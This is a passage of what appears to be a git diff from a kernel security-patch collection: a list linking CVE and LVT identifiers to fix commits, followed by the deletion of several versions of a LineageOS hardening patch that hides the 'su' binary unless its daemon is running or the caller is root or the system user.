^4.13 - https://github.com/torvalds/linux/commit/299d7572e46f98534033a9e65973f13ad1ce9047 -CVE-2017-16526 - Link - ^4.13 - https://github.com/torvalds/linux/commit/bbf26183b7a6236ba602f4d6a2f7cade35bba043 -CVE-2017-16527 - Link - ^4.13 - https://github.com/torvalds/linux/commit/124751d5e63c823092060074bd0abaae61aaa9c4 -CVE-2017-16528 - Link - ^4.13 - https://github.com/torvalds/linux/commit/fc27fe7e8deef2f37cba3f2be2d52b6ca5eb9d57 -CVE-2017-16529 - Link - ^4.13 - https://github.com/torvalds/linux/commit/bfc81a8bc18e3c4ba0cbaa7666ff76be2f998991 -CVE-2017-16530 - Link - ^4.13 - https://github.com/torvalds/linux/commit/786de92b3cb26012d3d0f00ee37adf14527f35c4 -CVE-2017-16531 - Link - ^4.13 - https://github.com/torvalds/linux/commit/bd7a3fe770ebd8391d1c7d072ff88e9e76d063eb -CVE-2017-16532 - Link - ^4.13 - https://github.com/torvalds/linux/commit/7c80f9e4a588f1925b07134bb2e3689335f6c6d8 -CVE-2017-16533 - Link - ^4.13 - https://github.com/torvalds/linux/commit/f043bfc98c193c284e2cd768fefabe18ac2fed9b -CVE-2017-16534 - Link - ^4.13 - https://github.com/torvalds/linux/commit/2e1c42391ff2556387b3cb6308b24f6f65619feb -CVE-2017-16535 - Link - ^4.13 - https://github.com/torvalds/linux/commit/1c0edc3633b56000e18d82fc241e3995ca18a69e -CVE-2017-16536 - Link - ^4.13 - https://patchwork.kernel.org/patch/9963527/ -CVE-2017-16537 - Link - ^4.13 - https://github.com/torvalds/linux/commit/58fd55e838276a0c13d1dc7c387f90f25063cbf3 -CVE-2017-16538 - Link - ^4.13 - https://patchwork.linuxtv.org/patch/44566/ - Link - ^4.13 - https://patchwork.linuxtv.org/patch/44567/ -CVE-2017-16643 - Link - 3.5+ - https://github.com/torvalds/linux/commit/a50829479f58416a013a4ccca791336af3c584c7 -CVE-2017-16644 - Link - https://patchwork.kernel.org/patch/9966135/ -CVE-2017-16645 - Link - https://github.com/torvalds/linux/commit/ea04efee7635c9120d015dcdeeeb6988130cb67a -CVE-2017-16646 - Link - https://patchwork.linuxtv.org/patch/45291/ -CVE-2017-16647 - Link - https://patchwork.ozlabs.org/patch/834686/ 
-CVE-2017-16648 - Link - https://github.com/torvalds/linux/commit/b1cb7372fa822af6c06c8045963571d13ad6348b -CVE-2017-16649 - Link - https://patchwork.ozlabs.org/patch/834771/ -CVE-2017-16650 - Link - https://patchwork.ozlabs.org/patch/834770/ -CVE-2017-16USB - Link - https://github.com/torvalds/linux/commit/7682e399485fe19622b6fd82510b1f4551e48a25 - Link - https://patchwork.kernel.org/patch/9972281/ - Link - https://github.com/torvalds/linux/commit/70e743e4cec3733dc13559f6184b35d358b9ef3f - Link - https://github.com/torvalds/linux/commit/122d6a347329818419b032c5a1776e6b3866d9b9 - Link - https://github.com/torvalds/linux/commit/0a8fd1346254974c3a852338508e4a4cddbb35f1 - Link - https://github.com/torvalds/linux/commit/f9a1c372299fed53d4b72bb601f7f3bfe6f9999c - Link - https://github.com/torvalds/linux/commit/58fc7f73a85d45a47057dad2af53502fdf6cf778 - Link - https://github.com/torvalds/linux/commit/2a4340c57717162c6bf07a0860d05711d4de994b - Link - https://github.com/torvalds/linux/commit/6815a0b444572527256f0d0efd8efe3ddede6018 -CVE-2016-GadgetFS - Link - https://github.com/torvalds/linux/commit/0173a68bfb0ad1c72a6ee39cc485aa2c97540b98 - Link - https://github.com/torvalds/linux/commit/520b72fc64debf8a86c3853b8e486aa5982188f0 - Link - https://github.com/torvalds/linux/commit/6e76c01e71551cb221c1f3deacb9dcd9a7346784 - Link - https://github.com/torvalds/linux/commit/f16443a034c7aa359ddf6f0f9bc40d01ca31faea - Link - https://github.com/torvalds/linux/commit/f50b878fed33e360d01dcdc31a8eeb1815d033d5 - Link - https://github.com/torvalds/linux/commit/bb1107f7c6052c863692a41f78c000db792334bf - Link - https://github.com/torvalds/linux/commit/faab50984fe6636e616c7cc3d30308ba391d36fd - Link - https://github.com/torvalds/linux/commit/bcdbeb844773333d2d1c08004f3b3e25921040e5 - Link - https://github.com/torvalds/linux/commit/1c069b057dcf64fada952eaa868d35f02bb0cfc2 - Link - https://github.com/torvalds/linux/commit/add333a81a16abbd4f106266a2553677a165725f - Link - 
https://github.com/torvalds/linux/commit/7b01738112608ce47083178ae2b9ebadf02d32cc
- Link - https://github.com/torvalds/linux/commit/0994b0a257557e18ee8f0b7c5f0f73fe2b54eec1
-LVT-2017-0001
- Link - 3.0 - https://review.lineageos.org/#/c/171511
- Link - 3.4 - https://review.lineageos.org/#/c/170648
- Link - 3.10 - https://review.lineageos.org/#/c/170624
- Link - 3.18 - https://review.lineageos.org/#/c/170516
-LVT-2017-0002
- Link - 3.4 - https://review.lineageos.org/#/c/173619
- Link - 3.10 - https://review.lineageos.org/#/c/173618
- Link - 3.18 - https://review.lineageos.org/#/c/173535
-LVT-2017-0003
- Link - 3.10 - https://review.lineageos.org/#/c/174289
-LVT-2017-0004
- Link - 3.4 - https://review.lineageos.org/#/c/182172
- Link - 3.10 - https://review.lineageos.org/#/c/182173
- Link - 3.18 - https://review.lineageos.org/#/c/182174
-CVE-0000-0000
-#The above line must be the last line
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch
deleted file mode 100644
index 60ca075d..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch
+++ /dev/null
@@ -1,213 +0,0 @@
-From 37639228b9d0c6b7ae27f706c777305fd8c93b83 Mon Sep 17 00:00:00 2001
-From: Tom Marshall
-Date: Fri, 28 Apr 2017 22:46:37 +0000
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-Note: this is for the 3.0 kernel and lacks the read-only mount point
-logic due to the non-extensible readdir implementation.
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled. Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: Ia7d50ba46c3d932c2b0ca5fc8e9ec69ec9045f85
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 21379c3..5188cea 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1538,6 +1538,11 @@
- if (retval < 0)
- goto out;
-
-+ if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+ current->flags |= PF_SU;
-+ su_exec();
-+ }
-+
- /* execve succeeded */
- current->fs->in_exec = 0;
- current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index c78d051..60e83a2 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -1616,6 +1616,11 @@
- }
- }
-
-+ if (!err) {
-+ if (d_is_su(nd->path.dentry) && !su_visible())
-+ err = -ENOENT;
-+ }
-+
- if (base)
- fput(base);
-
-diff --git a/fs/readdir.c b/fs/readdir.c
-index 356f715..0362f9e 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -47,6 +47,14 @@
-
- EXPORT_SYMBOL(vfs_readdir);
-
-+static bool hide_name(const char *name, int namlen)
-+{
-+ if (namlen == 2 && !memcmp(name, "su", 2))
-+ if (!su_visible())
-+ return true;
-+ return false;
-+}
-+
- /*
- * Traditional linux readdir() handling..
- *
-@@ -84,6 +92,8 @@
- buf->result = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen))
-+ return 0;
- buf->result++;
- dirent = buf->dirent;
- if (!access_ok(VERIFY_WRITE, dirent,
-@@ -163,6 +173,8 @@
- buf->error = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen))
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-@@ -244,6 +256,8 @@
- buf->error = -EINVAL; /* only used if we fail.. */
- if (reclen > buf->count)
- return -EINVAL;
-+ if (hide_name(name, namlen))
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index 33cf6ce..81982da 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -427,6 +427,11 @@
-
- extern struct dentry *lookup_create(struct nameidata *nd, int is_dir);
-
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
-+ return dentry && dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
-
- #endif /* __LINUX_DCACHE_H */
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 18203a1..b6cf92f 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -93,6 +93,12 @@
-
- #include
-
-+int su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- struct exec_domain;
- struct futex_pi_state;
- struct robust_list_head;
-@@ -1811,6 +1817,8 @@
- #define PF_FREEZER_SKIP 0x40000000 /* Freezer should not count it as freezable */
- #define PF_FREEZER_NOSIG 0x80000000 /* Freezer won't send signals to it */
-
-+#define PF_SU 0x00001000 /* task is su */
-+
- /*
- * Only the _current_ task can read/write to tsk->flags, but other
- * tasks can access tsk->flags in readonly mode for example
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 1e019f3..a0aca0c 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -956,6 +956,11 @@
- exit_irq_thread();
-
- exit_signals(tsk); /* sets PF_EXITING */
-+
-+ if (tsk->flags & PF_SU) {
-+ su_exit();
-+ }
-+
- /*
- * tsk->flags are checked in the futex code to protect against
- * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 3c26774..84cbf39 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -291,6 +291,8 @@
- if (err)
- goto out;
-
-+ tsk->flags &= ~PF_SU;
-+
- tsk->stack = ti;
-
- err = prop_local_init_single(&tsk->dirties);
-diff --git a/kernel/sched.c b/kernel/sched.c
-index cc6d028..1b64dac 100644
---- a/kernel/sched.c
-+++ b/kernel/sched.c
-@@ -84,6 +84,38 @@
- #define CREATE_TRACE_POINTS
- #include
-
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+ return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+ return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+ uid_t uid = current_uid();
-+ if (su_running())
-+ return true;
-+ if (uid == 0 || uid == 1000)
-+ return true;
-+ return false;
-+}
-+
-+void su_exec(void)
-+{
-+ atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+ atomic_dec(&__su_instances);
-+}
-+
- ATOMIC_NOTIFIER_HEAD(migration_notifier_head);
-
- /*
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch.base64
deleted file mode 100644
index b40e7c9d..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.0/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch
deleted file mode 100644
index aa76e0df..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch
+++ /dev/null
@@ -1,246 +0,0 @@
-From 9bf58feca7c29ccff89abce4b4fce3394ebaf437 Mon Sep 17 00:00:00 2001
-From: Tom Marshall
-Date: Wed, 25 Jan 2017 18:01:03 +0100
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled. Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: I79716c72f74d0b7af34ec3a8054896c6559a181d
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 227eb92..6f3965a 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1564,6 +1564,11 @@
- if (retval < 0)
- goto out;
-
-+ if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+ current->flags |= PF_SU;
-+ su_exec();
-+ }
-+
- /* execve succeeded */
- current->fs->in_exec = 0;
- current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index 827f0eb..a52456c 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -2000,6 +2000,14 @@
- }
- }
-
-+ if (!err) {
-+ struct super_block *sb = nd->inode->i_sb;
-+ if (sb->s_flags & MS_RDONLY) {
-+ if (d_is_su(nd->path.dentry) && !su_visible())
-+ err = -ENOENT;
-+ }
-+ }
-+
- if (base)
- fput(base);
-
-diff --git a/fs/readdir.c b/fs/readdir.c
-index d46eca8..d52d18d 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -39,6 +39,7 @@
- if (!IS_DEADDIR(inode)) {
- if (file->f_op->iterate) {
- ctx->pos = file->f_pos;
-+ ctx->romnt = (inode->i_sb->s_flags & MS_RDONLY);
- res = file->f_op->iterate(file, ctx);
- file->f_pos = ctx->pos;
- } else {
-@@ -52,6 +53,14 @@
- return res;
- }
- EXPORT_SYMBOL(iterate_dir);
-+
-+static bool hide_name(const char *name, int namlen)
-+{
-+ if (namlen == 2 && !memcmp(name, "su", 2))
-+ if (!su_visible())
-+ return true;
-+ return false;
-+}
-
- /*
- * Traditional linux readdir() handling..
-@@ -91,6 +100,8 @@
- buf->result = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen) && buf->ctx.romnt)
-+ return 0;
- buf->result++;
- dirent = buf->dirent;
- if (!access_ok(VERIFY_WRITE, dirent,
-@@ -168,6 +179,8 @@
- buf->error = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen) && buf->ctx.romnt)
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-@@ -246,6 +259,8 @@
- buf->error = -EINVAL; /* only used if we fail.. */
- if (reclen > buf->count)
- return -EINVAL;
-+ if (hide_name(name, namlen) && buf->ctx.romnt)
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index f84e0ee..5b04e17 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -413,6 +413,11 @@
- return dentry->d_flags & DCACHE_MOUNTED;
- }
-
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
-+ return dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
-
- #endif /* __LINUX_DCACHE_H */
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 8aae0ef..d07e5a1 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -1538,6 +1538,7 @@
- struct dir_context {
- const filldir_t actor;
- loff_t pos;
-+ bool romnt;
- };
-
- static inline bool dir_emit(struct dir_context *ctx,
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 9152f12..349a064 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -55,6 +55,12 @@
-
- #include
-
-+int su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- #define SCHED_ATTR_SIZE_VER0 48 /* sizeof first published struct */
-
- /*
-@@ -1822,6 +1828,8 @@
- #define PF_FREEZER_SKIP 0x40000000 /* Freezer should not count it as freezable */
- #define PF_WAKE_UP_IDLE 0x80000000 /* try to wake up on an idle CPU */
-
-+#define PF_SU 0x10000000 /* task is su */
-+
- /*
- * Only the _current_ task can read/write to tsk->flags, but other
- * tasks can access tsk->flags in readonly mode for example
-diff --git a/include/linux/uidgid.h b/include/linux/uidgid.h
-index 8e522cbc..cb4c867 100644
---- a/include/linux/uidgid.h
-+++ b/include/linux/uidgid.h
-@@ -64,6 +64,9 @@
- #define GLOBAL_ROOT_UID KUIDT_INIT(0)
- #define GLOBAL_ROOT_GID KGIDT_INIT(0)
-
-+#define GLOBAL_SYSTEM_UID KUIDT_INIT(1000)
-+#define GLOBAL_SYSTEM_GID KGIDT_INIT(1000)
-+
- #define INVALID_UID KUIDT_INIT(-1)
- #define INVALID_GID KGIDT_INIT(-1)
-
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 540bad4..e58c525 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -777,6 +777,10 @@
-
- sched_exit(tsk);
-
-+ if (tsk->flags & PF_SU) {
-+ su_exit();
-+ }
-+
- /*
- * tsk->flags are checked in the futex code to protect against
- * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 924c17c..fc5b8c4 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -326,6 +326,8 @@
- if (err)
- goto free_ti;
-
-+ tsk->flags &= ~PF_SU;
-+
- tsk->stack = ti;
- #ifdef CONFIG_SECCOMP
- /*
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index f888065..5f80d13 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -114,6 +114,38 @@
- local_irq_restore(dflags); \
- } while (0)
-
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+ return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+ return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+ kuid_t uid = current_uid();
-+ if (su_running())
-+ return true;
-+ if (uid_eq(uid, GLOBAL_ROOT_UID) || uid_eq(uid, GLOBAL_SYSTEM_UID))
-+ return true;
-+ return false;
-+}
-+
-+void su_exec(void)
-+{
-+ atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+ atomic_dec(&__su_instances);
-+}
-+
- const char *task_event_names[] = {"PUT_PREV_TASK", "PICK_NEXT_TASK",
- "TASK_WAKE", "TASK_MIGRATE", "TASK_UPDATE",
- "IRQ_UPDATE"};
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch.base64
deleted file mode 100644
index 29786325..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch
deleted file mode 100644
index a8e91130..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch
+++ /dev/null
@@ -1,246 +0,0 @@
-From 32c16ee3bef6a2d5edeb4e23bdb84e59a0387b3e Mon Sep 17 00:00:00 2001
-From: Tom Marshall
-Date: Wed, 25 Jan 2017 18:01:03 +0100
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled. Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: I79716c72f74d0b7af34ec3a8054896c6559a181d
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index b079500..e529a95 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1537,6 +1537,11 @@
- if (retval < 0)
- goto out;
-
-+ if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+ current->flags |= PF_SU;
-+ su_exec();
-+ }
-+
- /* execve succeeded */
- current->fs->in_exec = 0;
- current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index a14912e..e07a2dc 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -2025,6 +2025,14 @@
- }
- }
-
-+ if (!err) {
-+ struct super_block *sb = nd->inode->i_sb;
-+ if (sb->s_flags & MS_RDONLY) {
-+ if (d_is_su(nd->path.dentry) && !su_visible())
-+ err = -ENOENT;
-+ }
-+ }
-+
- out:
- if (base)
- fput(base);
-diff --git a/fs/readdir.c b/fs/readdir.c
-index 33fd922..b3089a1 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -39,6 +39,7 @@
- res = -ENOENT;
- if (!IS_DEADDIR(inode)) {
- ctx->pos = file->f_pos;
-+ ctx->romnt = (inode->i_sb->s_flags & MS_RDONLY);
- res = file->f_op->iterate(file, ctx);
- file->f_pos = ctx->pos;
- fsnotify_access(file);
-@@ -49,6 +50,14 @@
- return res;
- }
- EXPORT_SYMBOL(iterate_dir);
-+
-+static bool hide_name(const char *name, int namlen)
-+{
-+ if (namlen == 2 && !memcmp(name, "su", 2))
-+ if (!su_visible())
-+ return true;
-+ return false;
-+}
-
- /*
- * Traditional linux readdir() handling..
-@@ -88,6 +97,8 @@
- buf->result = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen) && buf->ctx.romnt)
-+ return 0;
- buf->result++;
- dirent = buf->dirent;
- if (!access_ok(VERIFY_WRITE, dirent,
-@@ -165,6 +176,8 @@
- buf->error = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen) && buf->ctx.romnt)
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-@@ -243,6 +256,8 @@
- buf->error = -EINVAL; /* only used if we fail.. */
- if (reclen > buf->count)
- return -EINVAL;
-+ if (hide_name(name, namlen) && buf->ctx.romnt)
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index 3cf440f..16bca1a 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -465,6 +465,11 @@
- return !d_is_negative(dentry);
- }
-
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
-+ return dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
-
- static inline unsigned long vfs_pressure_ratio(unsigned long val)
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 06334de..755a391 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -1495,6 +1495,7 @@
- struct dir_context {
- const filldir_t actor;
- loff_t pos;
-+ bool romnt;
- };
-
- struct block_device_operations;
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 353a291..83af519 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -61,6 +61,12 @@
-
- #include
-
-+int su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- #define SCHED_ATTR_SIZE_VER0 48 /* sizeof first published struct */
-
- /*
-@@ -2073,6 +2079,8 @@
- #define PF_FREEZER_SKIP 0x40000000 /* Freezer should not count it as freezable */
- #define PF_SUSPEND_TASK 0x80000000 /* this thread called freeze_processes and should not be frozen */
-
-+#define PF_SU 0x10000000 /* task is su */
-+
- /*
- * Only the _current_ task can read/write to tsk->flags, but other
- * tasks can access tsk->flags in readonly mode for example
-diff --git a/include/linux/uidgid.h b/include/linux/uidgid.h
-index 2d1f9b6..ef26f3f 100644
---- a/include/linux/uidgid.h
-+++ b/include/linux/uidgid.h
-@@ -42,6 +42,9 @@
- #define GLOBAL_ROOT_UID KUIDT_INIT(0)
- #define GLOBAL_ROOT_GID KGIDT_INIT(0)
-
-+#define GLOBAL_SYSTEM_UID KUIDT_INIT(1000)
-+#define GLOBAL_SYSTEM_GID KGIDT_INIT(1000)
-+
- #define INVALID_UID KUIDT_INIT(-1)
- #define INVALID_GID KGIDT_INIT(-1)
-
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 31003c7..d3a962e 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -730,6 +730,10 @@
-
- sched_exit(tsk);
-
-+ if (tsk->flags & PF_SU) {
-+ su_exit();
-+ }
-+
- /*
- * tsk->flags are checked in the futex code to protect against
- * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 600956b..390dbc3 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -339,6 +339,8 @@
- if (err)
- goto free_ti;
-
-+ tsk->flags &= ~PF_SU;
-+
- tsk->stack = ti;
- #ifdef CONFIG_SECCOMP
- /*
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index e7d3367..74b268f4 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -96,6 +96,38 @@
- #define CREATE_TRACE_POINTS
- #include
-
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+ return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+ return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+ kuid_t uid = current_uid();
-+ if (su_running())
-+ return true;
-+ if (uid_eq(uid, GLOBAL_ROOT_UID) || uid_eq(uid, GLOBAL_SYSTEM_UID))
-+ return true;
-+ return false;
-+}
-+
-+void su_exec(void)
-+{
-+ atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+ atomic_dec(&__su_instances);
-+}
-+
- const char *task_event_names[] = {"PUT_PREV_TASK", "PICK_NEXT_TASK",
- "TASK_WAKE", "TASK_MIGRATE", "TASK_UPDATE",
- "IRQ_UPDATE"};
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch.base64
deleted file mode 100644
index adf81058..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch
deleted file mode 100644
index 488015a9..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.4/0002.patch
+++ /dev/null
@@ -1,213 +0,0 @@
-From 70cfbfda0071b16160b82835a757ebecd14dc48b Mon Sep 17 00:00:00 2001
-From: Tom Marshall
-Date: Fri, 28 Apr 2017 22:46:37 +0000
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-Note: this is for the 3.4 kernel and lacks the read-only mount point
-logic due to the non-extensible readdir implementation.
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled. Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: Ia7d50ba46c3d932c2b0ca5fc8e9ec69ec9045f85
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index a4d05ce..b8c9af0 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1591,6 +1591,11 @@
- if (retval < 0)
- goto out;
-
-+ if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+ current->flags |= PF_SU;
-+ su_exec();
-+ }
-+
- /* execve succeeded */
- current->fs->in_exec = 0;
- current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index df12b57..0446469 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -1800,6 +1800,11 @@
- }
- }
-
-+ if (!err) {
-+ if (d_is_su(nd->path.dentry) && !su_visible())
-+ err = -ENOENT;
-+ }
-+
- if (base)
- fput(base);
-
-diff --git a/fs/readdir.c b/fs/readdir.c
-index cc0a822..106f156 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -47,6 +47,14 @@
-
- EXPORT_SYMBOL(vfs_readdir);
-
-+static bool hide_name(const char *name, int namlen)
-+{
-+ if (namlen == 2 && !memcmp(name, "su", 2))
-+ if (!su_visible())
-+ return true;
-+ return false;
-+}
-+
- /*
- * Traditional linux readdir() handling..
- *
-@@ -84,6 +92,8 @@
- buf->result = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen))
-+ return 0;
- buf->result++;
- dirent = buf->dirent;
- if (!access_ok(VERIFY_WRITE, dirent,
-@@ -163,6 +173,8 @@
- buf->error = -EOVERFLOW;
- return -EOVERFLOW;
- }
-+ if (hide_name(name, namlen))
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-@@ -244,6 +256,8 @@
- buf->error = -EINVAL; /* only used if we fail.. */
- if (reclen > buf->count)
- return -EINVAL;
-+ if (hide_name(name, namlen))
-+ return 0;
- dirent = buf->previous;
- if (dirent) {
- if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index 92e9d19..13efe38 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -403,6 +403,11 @@
-
- extern void d_clear_need_lookup(struct dentry *dentry);
-
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
